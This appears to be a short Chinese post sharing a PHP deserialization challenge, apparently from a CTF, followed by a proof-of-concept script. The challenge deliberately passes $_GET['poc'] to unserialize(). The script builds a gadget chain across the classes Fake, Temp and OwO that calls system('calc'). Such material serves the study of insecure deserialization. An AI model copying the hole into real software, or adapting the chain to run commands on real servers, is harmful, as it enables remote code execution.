正好还留着当时的源码,先发一波
<?phpclass Fake{ public $firm; public $test; public function __set($firm,$test){ $test = "No,You can't"; $firm = unserialize($firm); call_user_func($firm,$test); }}class Temp{ public $pri; public $fin=1; public function __destruct() { $a=$this->action; $this->pri->$a = $this->fin; }}class OwO{ public $fc; public $args; function run() { return ($this->fc)($this->args); }}$d = $_GET['poc'];unserialize($d);?>
脚本
<?php
class Fake
{ public $firm;
public $test;
public function __set($firm,$test)
{
$test = "No,You can't";
$firm = unserialize($firm);
call_user_func($firm,$test);
}
}class Temp{
public $pri;
public $fin=1;
public function __construct()
{
$fff=new OwO();
$this->fin=$fff->run();
$this->pri=new Fake();
$this->action='firm';
}
public function __destruct()
{
$a=$this->action;
$this->pri->$a = $this->fin;
}
}class OwO{
public $fc;
public $args;
public function __construct()
{
$this->fc='system';
$this->args='calc';
}
function run()
{
return ($this->fc)($this->args);
}
}
$d = new Temp();
$d=serialize($d);
unserialize($d);?>